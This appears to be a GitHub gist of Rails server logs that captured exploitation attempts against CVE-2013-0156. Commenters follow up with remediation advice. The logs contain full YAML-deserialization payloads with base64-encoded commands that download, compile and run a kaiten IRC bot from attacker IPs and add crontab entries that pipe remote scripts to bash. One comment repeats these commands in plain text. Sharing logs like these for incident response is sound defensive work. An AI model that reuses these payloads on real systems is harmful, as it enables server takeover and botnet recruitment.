Rendered layouts/_menu.html.erb (0.5ms)
Rendered layouts/_my_favs.html.haml (4.4ms)

Rendered layouts/_ride_request_form.html.erb (14.3ms)

Started GET "/" for 88.198.20.247 at 2013-05-24 18:53:33 +0000
Processing by PagesController#show as /
Parameters: {"mdalXTOJwb"=>"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n'LR; eval(%[c3lzdGVtKCd3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp].unpack(%[m0])[0]);' : !ruby/object:OpenStruct\n table:\n :defaults: {}\n", "id"=>"home"}
Rendered inline template within layouts/heavy (1.0ms)
Rendered layouts/_head.html.erb (5.5ms)
Rendered layouts/_social_links.html.erb (1.5ms)
Rendered layouts/_messages.html.haml (0.4ms)
Rendered layouts/_header.html.erb (0.7ms)
Rendered layouts/_menu.html.erb (0.1ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (3.7ms)

Started GET "/" for 88.198.20.247 at 2013-05-24 18:53:34 +0000
Processing by PagesController#show as /
Parameters: {"kFsacuPKMjhdHgm"=>"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n'BJmW; eval(%[c3lzdGVtKCd3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp].unpack(%[m0])[0]);' : !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n :FXX:\n :xxqntMoR: :NLOFpSw\n", "id"=>"home"}
Rendered inline template within layouts/heavy (0.4ms)
Rendered layouts/_head.html.erb (3.3ms)
Rendered layouts/_social_links.html.erb (1.0ms)
Rendered layouts/_messages.html.haml (0.2ms)
Rendered layouts/_header.html.erb (0.5ms)
Rendered layouts/_menu.html.erb (0.0ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (2.4ms)

Started GET "/" for 88.198.20.247 at 2013-05-24 20:50:42 +0000
Processing by PagesController#show as /
Parameters: {"id"=>"home"}
Rendered inline template within layouts/heavy (93.0ms)
Rendered layouts/_head.html.erb (6.8ms)
Rendered layouts/_social_links.html.erb (3.1ms)
Rendered layouts/_messages.html.haml (2.9ms)
Rendered layouts/_header.html.erb (1.3ms)
Rendered layouts/_menu.html.erb (0.4ms)
Rendered layouts/_my_favs.html.haml (4.0ms)

Rendered layouts/_ride_request_form.html.erb (13.2ms)

Started GET "/" for 88.198.20.247 at 2013-05-24 20:50:44 +0000
Processing by PagesController#show as /
Parameters: {"mdalXTOJwb"=>"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n'LR; eval(%[c3lzdGVtKCdjcm9udGFiIC1yOyBlY2hvICIxICogKiAqICogd2dldCAtTyAtIGNvbGtvbGR1bGQuY29tL2NtZDF8YmFzaDt3Z2V0IC1PIC0gbG9jaGpvbC5jb20vY21kMnxiYXNoO3dnZXQgIC1PIC0gZGRvcy5jYXQuY29tL2NtZDN8YmFzaDsifGNyb250YWIgLTt3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp].unpack(%[m0])[0]);' : !ruby/object:OpenStruct\n table:\n :defaults: {}\n", "id"=>"home"}
Rendered inline template within layouts/heavy (0.8ms)
Rendered layouts/_head.html.erb (5.1ms)
Rendered layouts/_social_links.html.erb (1.4ms)
Rendered layouts/_messages.html.haml (0.4ms)
Rendered layouts/_header.html.erb (0.6ms)
Rendered layouts/_menu.html.erb (0.1ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (3.4ms)

Started GET "/" for 88.198.20.247 at 2013-05-24 20:50:45 +0000
Processing by PagesController#show as /
Parameters: {"kFsacuPKMjhdHgm"=>"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n'BJmW; eval(%[c3lzdGVtKCdjcm9udGFiIC1yOyBlY2hvICIxICogKiAqICogd2dldCAtTyAtIGNvbGtvbGR1bGQuY29tL2NtZDF8YmFzaDt3Z2V0IC1PIC0gbG9jaGpvbC5jb20vY21kMnxiYXNoO3dnZXQgIC1PIC0gZGRvcy5jYXQuY29tL2NtZDN8YmFzaDsifGNyb250YWIgLTt3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp].unpack(%[m0])[0]);' : !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n :FXX:\n :xxqntMoR: :NLOFpSw\n", "id"=>"home"}
Rendered inline template within layouts/heavy (0.5ms)
Rendered layouts/_head.html.erb (3.3ms)
Rendered layouts/_social_links.html.erb (1.0ms)
Rendered layouts/_messages.html.haml (0.2ms)
Rendered layouts/_header.html.erb (0.5ms)
Rendered layouts/_menu.html.erb (0.0ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (2.3ms)

Started GET "/" for 88.198.20.247 at 2013-05-24 23:15:12 +0000
Rendered /home/ggr/apps/ggr-dispatch/shared/bundle/ruby/1.9.1/gems/activeadmin-0.5.1/app/views/active_admin/resource/index.html.arb (3005.1ms)
Completed 200 OK in 3309ms (Views: 3197.3ms | ActiveRecord: 40.3ms)
Processing by PagesController#show as /
Parameters: {"id"=>"home"}
Rendered inline template within layouts/heavy (86.6ms)
Rendered layouts/_head.html.erb (7.4ms)
Rendered layouts/_social_links.html.erb (4.2ms)
Rendered layouts/_messages.html.haml (4.0ms)
Rendered layouts/_header.html.erb (1.7ms)

Rendered layouts/_menu.html.erb (0.5ms)

Started GET "/" for 88.198.20.247 at 2013-05-24 23:15:14 +0000
Error occurred while parsing request parameters.
Contents:

SyntaxError ((eval):1: syntax error, unexpected tFLOAT, expecting $end
wget http://88.198.20.247/k.c -O /tmp/k.c; gcc ...
^):
actionpack (3.2.8) lib/action_dispatch/routing/route_set.rb:176:in eval' actionpack (3.2.8) lib/action_dispatch/routing/route_set.rb:176:indefine_hash_access'
actionpack (3.2.8) lib/action_dispatch/routing/route_set.rb:175:in module_eval' actionpack (3.2.8) lib/action_dispatch/routing/route_set.rb:175:indefine_hash_access'
actionpack (3.2.8) lib/action_dispatch/routing/route_set.rb:166:in block in define_named_route_methods' actionpack (3.2.8) lib/action_dispatch/routing/route_set.rb:164:ineach'
actionpack (3.2.8) lib/action_dispatch/routing/route_set.rb:164:in define_named_route_methods' actionpack (3.2.8) lib/action_dispatch/routing/route_set.rb:115:inadd'

/usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych/visitors/to_ruby.rb:273:in `block in revive_hash'

Started GET "/" for 88.198.20.247 at 2013-05-24 23:15:14 +0000
Processing by PagesController#show as /
Parameters: {"kFsacuPKMjhdHgm"=>"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n'BJmW; eval(%[d2dldCBodHRwOi8vODguMTk4LjIwLjI0Ny9rLmMgLU8gL3RtcC9rLmM7IGdjYyAtbyAvdG1wL2sgL3RtcC9rLmM7IGNobW9kICt4IC90bXAvazsgL3RtcC9rfHx3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2sgLU8gL3RtcC9rICYmIGNobW9kICt4IC90bXAvayAmJiAvdG1wL2snKQ==].unpack(%[m0])[0]);' : !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n :FXX:\n :xxqntMoR: :NLOFpSw\n", "id"=>"home"}
Rendered inline template within layouts/heavy (0.5ms)
Rendered layouts/_head.html.erb (3.7ms)
Rendered layouts/_social_links.html.erb (108.5ms)
Rendered layouts/_messages.html.haml (0.3ms)
Rendered layouts/_header.html.erb (0.7ms)
Rendered layouts/_menu.html.erb (0.0ms)
Rendered layouts/_my_favs.html.haml (0.4ms)
Rendered layouts/_ride_request_form.html.erb (3.0ms)

from 95.138.186.181:

Started GET "/" for 95.138.186.181 at 2013-05-26 01:16:17 +0000
Processing by PagesController#show as HTML
Parameters: {"<id type"=>""yaml">", "#10"=>nil, "---"=>nil, "!ruby/object:Gem::Requirement"=>nil, "requirements:"=>nil, "- !ruby/object:Rack::Session::Abstract::SessionHash"=>nil, "env:"=>nil, "HTTP_COOKIE: "a"=>"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"", "by: !ruby/object:Rack::Session::Cookie"=>nil, "coder: !ruby/object:Rack::Session::Cookie::Base64::Marshal {}"=>nil, "key: a"=>nil, "secrets: "=>[nil], "exists: true"=>nil, ""=>nil, "id"=>"home"}
Rendered inline template within layouts/heavy (80.4ms)
Rendered layouts/_head.html.erb (3.4ms)
Rendered layouts/_social_links.html.erb (1.0ms)
Rendered layouts/_messages.html.haml (0.2ms)
Rendered layouts/_header.html.erb (0.6ms)
Rendered layouts/_menu.html.erb (0.1ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (2.4ms)

Started GET "/" for 95.138.186.181 at 2013-05-26 03:06:59 +0000
Processing by PagesController#show as /
Parameters: {"id"=>"home"}
Rendered inline template within layouts/heavy (1.2ms)
Rendered layouts/_head.html.erb (9.4ms)
Rendered layouts/_social_links.html.erb (2.9ms)
Rendered layouts/_messages.html.haml (4.3ms)
Rendered layouts/_header.html.erb (1.9ms)
Rendered layouts/_menu.html.erb (0.6ms)
Rendered layouts/_my_favs.html.haml (5.3ms)

Rendered layouts/_ride_request_form.html.erb (14.7ms)

Started GET "/" for 95.138.186.181 at 2013-05-26 03:07:01 +0000
Processing by PagesController#show as /
Parameters: {"mdalXTOJwb"=>"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n'LR; eval(%[c3lzdGVtKCdjcm9udGFiIC1yOyBlY2hvICIxICogKiAqICogd2dldCAtTyAtIGNvbGtvbGR1bGQuY29tL2NtZDF8YmFzaDt3Z2V0IC1PIC0gbG9jaGpvbC5jb20vY21kMnxiYXNoO3dnZXQgIC1PIC0gZGRvcy5jYXQuY29tL2NtZDN8YmFzaDsifGNyb250YWIgLTt3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp].unpack(%[m0])[0]);' : !ruby/object:OpenStruct\n table:\n :defaults: {}\n", "id"=>"home"}
Rendered inline template within layouts/heavy (1.0ms)
Rendered layouts/_head.html.erb (5.2ms)
Rendered layouts/_social_links.html.erb (1.4ms)
Rendered layouts/_messages.html.haml (0.4ms)
Rendered layouts/_header.html.erb (0.6ms)
Rendered layouts/_menu.html.erb (0.1ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (3.7ms)

Started GET "/" for 95.138.186.181 at 2013-05-26 03:07:02 +0000
Processing by PagesController#show as /
Parameters: {"kFsacuPKMjhdHgm"=>"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n'BJmW; eval(%[c3lzdGVtKCdjcm9udGFiIC1yOyBlY2hvICIxICogKiAqICogd2dldCAtTyAtIGNvbGtvbGR1bGQuY29tL2NtZDF8YmFzaDt3Z2V0IC1PIC0gbG9jaGpvbC5jb20vY21kMnxiYXNoO3dnZXQgIC1PIC0gZGRvcy5jYXQuY29tL2NtZDN8YmFzaDsifGNyb250YWIgLTt3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp].unpack(%[m0])[0]);' : !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n :FXX:\n :xxqntMoR: :NLOFpSw\n", "id"=>"home"}
Rendered inline template within layouts/heavy (0.4ms)
Rendered layouts/_head.html.erb (3.1ms)
Rendered layouts/_social_links.html.erb (1.0ms)
Rendered layouts/_messages.html.haml (0.2ms)
Rendered layouts/_header.html.erb (0.5ms)
Rendered layouts/_menu.html.erb (0.0ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (2.4ms)

Started GET "/" for 95.138.186.181 at 2013-05-26 13:38:05 +0000
Processing by PagesController#show as /
Parameters: {"id"=>"home"}
Rendered inline template within layouts/heavy (0.9ms)
Rendered layouts/_head.html.erb (12.5ms)
Rendered layouts/_social_links.html.erb (2.3ms)
Rendered layouts/_messages.html.haml (3.3ms)
Rendered layouts/_header.html.erb (134.1ms)
Rendered layouts/_menu.html.erb (0.8ms)
Rendered layouts/_my_favs.html.haml (4.6ms)

Rendered layouts/_ride_request_form.html.erb (13.1ms)

Started GET "/" for 95.138.186.181 at 2013-05-26 13:38:06 +0000
Processing by PagesController#show as /
Parameters: {"mdalXTOJwb"=>"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n'LR; eval(%[c3lzdGVtKCdjcm9udGFiIC1yOyBlY2hvICIxICogKiAqICogd2dldCAtTyAtIGNvbGtvbGR1bGQuY29tL2NtZDF8YmFzaDt3Z2V0IC1PIC0gbG9jaGpvbC5jb20vY21kMnxiYXNoO3dnZXQgIC1PIC0gZGRvcy5jYXQuY29tL2NtZDN8YmFzaDsifGNyb250YWIgLTt3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp].unpack(%[m0])[0]);' : !ruby/object:OpenStruct\n table:\n :defaults: {}\n", "id"=>"home"}
Rendered inline template within layouts/heavy (1.0ms)
Rendered layouts/_head.html.erb (5.5ms)
Rendered layouts/_social_links.html.erb (1.6ms)
Rendered layouts/_messages.html.haml (0.4ms)
Rendered layouts/_header.html.erb (0.7ms)
Rendered layouts/_menu.html.erb (0.1ms)
Rendered layouts/_my_favs.html.haml (0.9ms)

Rendered layouts/_ride_request_form.html.erb (4.2ms)

Started GET "/" for 95.138.186.181 at 2013-05-26 13:38:08 +0000
Processing by PagesController#show as /
Parameters: {"kFsacuPKMjhdHgm"=>"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n'BJmW; eval(%[c3lzdGVtKCdjcm9udGFiIC1yOyBlY2hvICIxICogKiAqICogd2dldCAtTyAtIGNvbGtvbGR1bGQuY29tL2NtZDF8YmFzaDt3Z2V0IC1PIC0gbG9jaGpvbC5jb20vY21kMnxiYXNoO3dnZXQgIC1PIC0gZGRvcy5jYXQuY29tL2NtZDN8YmFzaDsifGNyb250YWIgLTt3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp].unpack(%[m0])[0]);' : !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n :FXX:\n :xxqntMoR: :NLOFpSw\n", "id"=>"home"}
Rendered inline template within layouts/heavy (0.6ms)
Rendered layouts/_head.html.erb (3.9ms)
Rendered layouts/_social_links.html.erb (1.2ms)
Rendered layouts/_messages.html.haml (0.4ms)
Rendered layouts/_header.html.erb (0.6ms)
Rendered layouts/_menu.html.erb (0.1ms)
Rendered layouts/_my_favs.html.haml (0.3ms)
Rendered layouts/_ride_request_form.html.erb (2.9ms)

from 188.190.126.105:

Started GET "/" for 188.190.126.105 at 2013-05-23 02:53:01 +0000
Error occurred while parsing request parameters.
Contents:

Psych::SyntaxError ((): control characters are not allowed at line 1 column 1):
/usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych.rb:203:in parse' /usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych.rb:203:inparse_stream'
/usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych.rb:151:in `parse'

/usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych.rb:127:in `load'

Started GET "/" for 188.190.126.105 at 2013-05-23 02:53:01 +0000
Processing by PagesController#show as /
Parameters: {"id"=>"home"}
Rendered inline template within layouts/heavy (1.1ms)
Rendered layouts/_head.html.erb (7.1ms)
Rendered layouts/_social_links.html.erb (3.5ms)
Rendered layouts/_messages.html.haml (3.0ms)
Rendered layouts/_header.html.erb (1.6ms)
Rendered layouts/_menu.html.erb (0.7ms)
Rendered layouts/_my_favs.html.haml (4.7ms)

Rendered layouts/_ride_request_form.html.erb (15.1ms)

Started GET "/" for 188.190.126.105 at 2013-05-23 02:53:04 +0000
Processing by PagesController#show as /
Parameters: {"mdalXTOJwb"=>"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n'LR; eval(%[c3lzdGVtKCJ3Z2V0IC1PIC92YXIvdG1wL2sgMTg4LjE5MC4xMjQuMTIwL2thaXRlbi1iaW4iKQpzeXN0ZW0oImNobW9kICt4IC92YXIvdG1wL2siKQpzeXN0ZW0oIi92YXIvdG1wL2siKQpzeXN0ZW0oJ2Nyb250YWIgLXInKQpzeXN0ZW0oJyhjcm9udGFiIC1sIDsgZWNobyAiKiAxICogKiAqIHdnZXQgLU8gL3Zhci90bXAvayAxODguMTkwLjEyNC4xMjAva2FpdGVuLWJpbiAmJiBjaG1vZCAreCAvdmFyL3RtcC9rICYmIC92YXIvdG1wL2siKSB8IGNyb250YWIgLScp].unpack(%[m0])[0]);' : !ruby/object:OpenStruct\n table:\n :defaults: {}\n", "id"=>"home"}
Rendered inline template within layouts/heavy (0.9ms)
Rendered layouts/_head.html.erb (6.0ms)
Rendered layouts/_social_links.html.erb (1.7ms)
Rendered layouts/_messages.html.haml (0.5ms)
Rendered layouts/_header.html.erb (0.9ms)
Rendered layouts/_menu.html.erb (0.0ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (3.5ms)

Started GET "/" for 188.190.126.105 at 2013-05-23 05:29:01 +0000
Error occurred while parsing request parameters.
Contents:

Psych::SyntaxError ((): control characters are not allowed at line 1 column 1):
/usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych.rb:203:in parse' /usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych.rb:203:inparse_stream'
/usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych.rb:151:in `parse'

/usr/local/rvm/rubies/ruby-1.9.3-p327/lib/ruby/1.9.1/psych.rb:127:in `load'

Started GET "/" for 188.190.126.105 at 2013-05-23 05:29:02 +0000
Processing by PagesController#show as /
Parameters: {"id"=>"home"}
Rendered inline template within layouts/heavy (1.0ms)
Rendered layouts/_head.html.erb (9.7ms)
Rendered layouts/_social_links.html.erb (1.7ms)
Rendered layouts/_messages.html.haml (0.6ms)
Rendered layouts/_header.html.erb (1.0ms)
Rendered layouts/_menu.html.erb (0.1ms)
Rendered layouts/_my_favs.html.haml (0.3ms)

Rendered layouts/_ride_request_form.html.erb (3.4ms)

Started GET "/" for 188.190.126.105 at 2013-05-23 05:29:05 +0000
Processing by PagesController#show as /
Parameters: {"mdalXTOJwb"=>"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n'LR; eval(%[c3lzdGVtKCJ3Z2V0IC1PIC92YXIvdG1wL2suYyAxODguMTkwLjEyNC4xMjAva2FpdGVuLXNyYy5jIikKc3lzdGVtKCJnY2MgLW8gL3Zhci90bXAva2EgL3Zhci90bXAvay5jIikKc3lzdGVtKCJjaG1vZCAreCAvdmFyL3RtcC9rYSIpCnN5c3RlbSgiL3Zhci90bXAva2EiKQpzeXN0ZW0oJ2Nyb250YWIgLXInKQpzeXN0ZW0oJyhjcm9udGFiIC1sIDsgZWNobyAiKiAxICogKiAqIHdnZXQgLU8gL3Zhci90bXAvay5jIDE4OC4xOTAuMTI0LjEyMC9rYWl0ZW4tc3JjLmMgJiYgZ2NjIC1vIC92YXIvdG1wL2thIC92YXIvdG1wL2suYyAmJiBjaG1vZCAreCAvdmFyL3RtcC9rYSAmJiAvdmFyL3RtcC9rYSIpIHwgY3JvbnRhYiAtJyk=].unpack(%[m0])[0]);' : !ruby/object:OpenStruct\n table:\n :defaults: {}\n", "id"=>"home"}
Rendered inline template within layouts/heavy (1.1ms)
Rendered layouts/_head.html.erb (155.5ms)
Rendered layouts/_social_links.html.erb (1.3ms)
Rendered layouts/_messages.html.haml (0.4ms)
Rendered layouts/_header.html.erb (0.9ms)
Rendered layouts/_menu.html.erb (0.0ms)
Rendered layouts/_my_favs.html.haml (0.3ms)
Rendered layouts/_ride_request_form.html.erb (3.0ms)

Regards.

@Netmisa

Netmisa commented May 27, 2013

It's one of the stable ones, sorry I can't check now.

Ruby version: 1.9.3-p327
Rails version: 3.2

@conqueringlion93

Hi here !

I've disconnected my server until I find a solution... and I believe I have it:

chmod 700 /usr/bin/wget

=> http://forums.cpanel.net/f185/wget-abuse-hack-340232.html
this is a recent thread .. so I will test it tonight..

After more searching on the subject, it seems to be this exploit:

http://1337day.com/exploit/20596

@conqueringlion93

After doing the chmod on wget, I receive another log from my server:

/bin/sh: wget: Permission denied
/bin/sh: wget: Permission denied
/bin/sh: wget: Permission denied

Don't forget to edit /var/spool/cron/crontabs/www-data with vi
and delete the line about wget.

@conqueringlion93

Last information:

I'm running Rails 3.2.3 with ruby 1.9.2p320 (2012-04-20 revision 35421) [i686-linux]

@ErneX

ErneX commented May 27, 2013

@packetlss

This is an exploit of an old Rails bug (CVE-2013-0156).

Clean your systems and update to 3.2.12.

In the future, make sure you subscribe to the rubyonrails-security mailing list to keep up to date with patches.

https://groups.google.com/forum/?fromgroups#!forum/rubyonrails-security

@tomfakes

I'm building an application which will integrate with GitHub to alert you when a vulnerability is found in any of the Gems that your application uses.

For this case, you would have received an alert when the Rails vulnerabilities were found, and would then have had time to update your application before an attacker got access.

Sign up to be informed when this is ready here: http://www.rubyaudit.com

@rogerthat

please update your rails-installation:

http://charlie.bz/blog/rails-3.2.10-remote-code-execution

@borski

borski commented May 27, 2013

The Gem::Requirements piece makes me think it's the Rails YAML parameter vulnerability from a few months ago. Even if you've updated versions, you may still be vulnerable. You can check here to see if that's the bug: https://www.tinfoilsecurity.com/railscheck

If your server has been compromised, you must rebuild from scratch - updating versions isn't enough.

@tekknolagi

It looks like it's part of a botnet, as it's using IRC.

@dylancopeland

@bu2, my server was hit (but not successfully exploited) yesterday by one of the listed IPs; 95.138.186.181. Rollbar.io seems to have caught it and logged it 6 times. The exact error is Hash::DisallowedType: Disallowed type attribute: "yaml".

@tadman

tadman commented May 28, 2013

You can test for vulnerable versions in applications automatically with GemCanary which can be especially helpful if you have a large number of applications and lose track of some of them from time to time. I've found it presents the various alerts in a context that's relevant to you based on your Gemfile.lock.

@ismasan
Author

ismasan commented May 28, 2013

Wow. I think this needs some clarification. I was not who posted it to HN. This is a rather old Rails vulnerability that has since been patched and explained. It was all over the internet back in January. I updated my apps as soon as the patches were made available and none of my servers were ever successfully attacked in this way. I just spotted the backtraces in my error logs and posted the offending code here for reference.

All the comments and discussion are appreciated but I will suggest that if you were affected by this and plan to start a discussion then use your own fork and attribution. Thanks!

@conqueringlion93

Hi,

And what about my configuration?

Server version: Apache/2.2.14 (Ubuntu)
Rails 3.2.3
ruby 1.9.2p320 (2012-04-20 revision 35421) [i686-linux]

No nginx, no Rails 3.2.1, no Redmine, no YAML problem, but I had the same problem detailed below:

  • k.c, k and ka files in /var/tmp (probably an IRC script)
  • a new line in my crontab executing wget commands like these:

wget -O /var/tmp/k.c 188.190.124.120/kaiten-src.c && gcc -o /var/tmp/ka /var/tmp/k.c && chmod +x /var/tmp/ka && /var/tmp/ka‏

wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O -

wget -O /var/tmp/k colkolduld.com/req/work.php && chmod +x /var/tmp/k && /var/tmp/k‏

I did not find any suspicious trace in my Apache log, but there were some fail2ban actions (I didn't look deeper since the chmod and the www-data cron update resolved my problem as described above).

I'm still searching for how the malicious scripts were uploaded to my server...

@Batistleman

Hi,

my server was infected too, should I do a reinstall? Or should removing the files and upgrading rails be enough?

@rogerthat

my server was infected too, should I do a reinstall?

definitely

@Leglaw

Leglaw commented May 29, 2013

@Netmisa : I've since uninstalled PhpMyAdmin from my server, but I was using one installed by apt-get -- 3.4.5-1.

@Netmisa

Netmisa commented May 30, 2013

OK, anyway we now know where the problem comes from.

@sorenwiz
